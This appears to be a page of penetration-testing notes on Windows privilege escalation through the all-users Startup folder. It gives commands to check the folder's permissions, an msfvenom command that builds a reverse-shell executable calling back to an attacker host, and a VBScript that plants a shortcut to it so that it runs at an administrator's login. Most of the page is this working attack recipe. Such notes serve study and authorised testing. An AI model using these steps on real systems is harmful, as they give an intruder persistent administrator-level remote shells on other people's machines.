Startup Apps

Similar to AutoRun. Windows stores Startup applications in:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

The files in this directory are shortcuts (lnk files).

#In Low level shell run:
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
#Check if BUILTIN\Users group has full access (F)

#You can also run accesschk.exe to check for (F)
accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

#Generate payloaad:
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=port -f exe -o x.exe

#METHOD 1
#Transfer it to 
C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup

#Start a netcat listener and simulate a login from admin to get a shell

#METHOD 2
#Transfer the reverse shell exe to C:\Temp\reverse.exe
#Create a VBScript to create a shortcut of that exe to the StartUp directory:
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\Temp\reverse.exe"
oLink.Save

#Transfer the VBScript to target machine
#Run the script to create a shortcut:
cscript CreateShortcut.vbs

#Simulate an admin login to get a shell

PreviousDLL Hijacking NextExecutable Files

Last updated 4 years ago

Was this helpful?